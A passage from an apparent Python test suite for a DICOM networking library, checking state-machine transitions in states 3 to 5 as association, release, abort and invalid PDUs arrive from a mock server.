assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def move_to_state(self, assoc, scp):
def connect(address):
"""Override the socket's connect so no event gets added."""
if assoc.dul.socket.socket is None:
assoc.dul.socket.socket = (
assoc.dul.socket._create_socket()
)
try:
assoc.dul.socket.socket.connect(address)
assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
assoc.dul.socket.close()
assoc.dul.socket.connect = connect
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta4')
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta5')
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('exit', None)
]
self.scp = scp = self.start_server(commands)
